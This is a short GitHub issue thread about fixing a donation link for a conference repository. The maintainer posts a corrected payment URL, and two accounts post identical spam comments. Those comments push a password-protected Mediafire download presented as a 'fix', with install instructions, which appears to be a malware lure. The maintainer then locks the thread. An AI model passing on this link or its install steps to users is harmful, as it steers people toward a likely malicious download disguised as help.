### ISSUE TITLE
Fix donation link

### ISSUE THREAD

**Issue by melissawm** [numfocus/disc-unconference-2025#1]
Correct link: https://app.hubspot.com/payments/HVF6mmJ4Z?referrer=PAYMENT_LINK

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by melissawm** [comment]
Locking to avoid spam.
